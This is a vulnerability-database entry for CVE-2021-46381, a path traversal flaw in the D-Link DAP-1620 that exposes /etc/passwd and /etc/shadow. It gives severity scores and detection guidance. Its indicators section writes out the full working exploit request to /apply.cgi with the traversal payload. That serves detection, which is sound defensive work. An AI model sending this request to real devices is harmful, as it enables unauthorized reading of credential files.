cbcvebase.
CVE-2021-46381
published 2022-03-04

CVE-2021-46381: Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].

PriorityP180high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
57.98%
99.0th percentile
Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].

Detection & IOCsextracted from sources · hover to see the quote

url/apply.cgi
commandaction=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass
path../../../../../../../../../../../../../../etc/passwd
yara
regex: root:.*:0:0:
bytes
490a0046304402202af690770e9006f89e4de84567b484857812d481914449434b5245491daa68e202207f835a7d797095a8e3434d1cb6bf9526da49ff2771af10273bf0307896894b58:922c64590222798bb761d5b6d8e72950
  • Exploit targets POST /apply.cgi with action=do_graph_auth and a path-traversal sequence in the html_response_page parameter to read /etc/passwd or /etc/shadow.
  • Successful exploitation returns content matching 'root:.*:0:0:' in the HTTP response body, indicating /etc/passwd was read.
  • Monitor for POST requests to /apply.cgi containing '../' sequences in the html_response_page parameter, targeting /etc/passwd or /etc/shadow.
  • ·The exploit was tested specifically against D-Link DAP-1620 A1 hardware revision running firmware v1.01; other revisions or firmware versions may not be vulnerable.

CVSS provenance

nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.